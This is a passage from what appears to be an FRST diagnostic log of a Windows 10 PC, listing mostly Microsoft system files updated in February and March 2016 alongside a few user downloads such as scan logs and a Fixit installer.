2016-03-09 16:33 - 2016-02-24 00:09 - 01443328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 00793600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 00552960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-03-09 16:33 - 2016-02-24 00:07 - 00890368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-03-09 16:33 - 2016-02-24 00:07 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-03-09 16:33 - 2016-02-24 00:04 - 01497088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-09 16:33 - 2016-02-24 00:03 - 00769536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-03-09 16:33 - 2016-02-23 23:57 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-03-09 16:33 - 2016-02-23 23:43 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-03-09 16:33 - 2016-02-23 23:22 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-03-08 17:33 - 2016-03-08 17:34 - 00072040 _____ C:\Users\levilaing\Downloads\FRST.txt
2016-03-08 17:33 - 2016-03-08 17:33 - 02374144 _____ (Farbar) C:\Users\levilaing\Desktop\FRST64.exe
2016-03-08 17:29 - 2016-03-08 17:32 - 00000253 _____ C:\Users\levilaing\Downloads\Search.txt
2016-03-08 17:16 - 2016-03-09 20:35 - 00000000 ____D C:\FRST
2016-03-08 16:37 - 2016-03-08 16:38 - 00041639 _____ C:\Users\levilaing\Downloads\Addition.txt
2016-03-01 13:31 - 2016-03-01 13:31 - 00000860 _____ C:\WINDOWS\system32\Drivers\etc\hosts.bak
2016-03-01 13:26 - 2016-03-01 13:50 - 00000000 ____D C:\Users\levilaing\AppData\Local\NPE
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 04:32 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 04:31 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-03-01 12:58 - 2016-02-23 03:38 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 03:27 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-01 12:58 - 2016-02-23 02:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-03-01 12:58 - 2016-02-23 02:29 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-03-01 12:58 - 2016-02-23 02:28 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-03-01 12:58 - 2016-02-23 02:09 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-03-01 12:58 - 2016-02-23 02:00 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-03-01 12:58 - 2016-02-23 01:58 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-03-01 12:58 - 2016-02-23 01:30 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-03-01 12:58 - 2016-02-23 01:24 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-03-01 12:58 - 2016-02-23 00:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 09919488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-01 12:58 - 2016-02-08 21:24 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-03-01 12:58 - 2016-02-08 21:04 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-03-01 12:57 - 2016-02-23 05:29 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-03-01 12:57 - 2016-02-23 05:29 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-01 12:57 - 2016-02-23 05:27 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-01 12:57 - 2016-02-23 05:25 - 02152288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-03-01 12:57 - 2016-02-23 05:25 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-03-01 12:57 - 2016-02-23 05:25 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-03-01 12:57 - 2016-02-23 05:15 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-03-01 12:57 - 2016-02-23 05:08 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-03-01 12:57 - 2016-02-23 04:34 - 01859960 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-03-01 12:57 - 2016-02-23 04:34 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00696160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-03-01 12:57 - 2016-02-23 04:31 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-03-01 12:57 - 2016-02-23 04:25 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-01 12:57 - 2016-02-23 04:22 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-03-01 12:57 - 2016-02-23 04:17 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-03-01 12:57 - 2016-02-23 03:40 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-03-01 12:57 - 2016-02-23 03:39 - 00502112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-03-01 12:57 - 2016-02-23 03:37 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:32 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-01 12:57 - 2016-02-23 03:30 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-01 12:57 - 2016-02-23 03:27 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 03:25 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-03-01 12:57 - 2016-02-23 03:20 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-03-01 12:57 - 2016-02-23 03:20 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-03-01 12:57 - 2016-02-23 03:19 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-03-01 12:57 - 2016-02-23 03:17 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-03-01 12:57 - 2016-02-23 03:12 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-03-01 12:57 - 2016-02-23 03:10 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-03-01 12:57 - 2016-02-23 03:07 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 03:07 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-03-01 12:57 - 2016-02-23 03:06 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-03-01 12:57 - 2016-02-23 03:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-01 12:57 - 2016-02-23 03:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-01 12:57 - 2016-02-23 03:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-03-01 12:57 - 2016-02-23 02:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:56 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-03-01 12:57 - 2016-02-23 02:53 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-03-01 12:57 - 2016-02-23 02:53 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-03-01 12:57 - 2016-02-23 02:52 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-03-01 12:57 - 2016-02-23 02:50 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-03-01 12:57 - 2016-02-23 02:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-03-01 12:57 - 2016-02-23 02:48 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 02:40 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-03-01 12:57 - 2016-02-23 02:39 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 02:33 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-03-01 12:57 - 2016-02-23 02:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-03-01 12:57 - 2016-02-23 02:31 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-03-01 12:57 - 2016-02-23 02:27 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-03-01 12:57 - 2016-02-23 02:26 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-03-01 12:57 - 2016-02-23 02:23 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-03-01 12:57 - 2016-02-23 02:18 - 00557056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 02:12 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-03-01 12:57 - 2016-02-23 02:05 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:04 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-03-01 12:57 - 2016-02-23 02:02 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-03-01 12:57 - 2016-02-23 01:58 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:57 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 01:52 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-03-01 12:57 - 2016-02-23 01:50 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 01:49 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 01:48 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 01:38 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 01:35 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-03-01 12:57 - 2016-02-23 01:31 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 01:22 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:20 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:17 - 02635264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 01:14 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 01:11 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-03-01 12:57 - 2016-02-23 01:05 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:01 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-03-01 12:57 - 2016-02-23 00:59 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-03-01 12:57 - 2016-02-23 00:58 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-03-01 12:57 - 2016-02-23 00:56 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-03-01 12:57 - 2016-02-23 00:53 - 01799168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 00:51 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 00:42 - 03425792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:41 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:36 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:35 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:33 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:32 - 02793472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:30 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-03-01 12:57 - 2016-02-23 00:28 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-03-01 12:57 - 2016-02-08 22:28 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-03-01 12:57 - 2016-02-08 22:13 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-03-01 12:57 - 2016-02-08 21:18 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:18 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-02-23 13:55 - 2016-02-23 13:55 - 00007238 _____ C:\Users\levilaing\Downloads\ACRB.txt
2016-02-16 17:08 - 2016-02-16 17:08 - 01046528 _____ C:\Users\levilaing\Downloads\MicrosoftFixit50848.msi
2016-02-12 13:50 - 2016-03-09 18:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-09 13:01 - 2016-01-29 00:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-02-09 13:01 - 2016-01-29 00:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-02-09 13:01 - 2016-01-26 23:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-02-09 13:01 - 2016-01-26 23:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-09 13:01 - 2016-01-26 23:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-02-09 13:01 - 2016-01-26 23:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-09 13:01 - 2016-01-26 23:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll
2016-02-09 13:01 - 2016-01-26 23:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:01 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
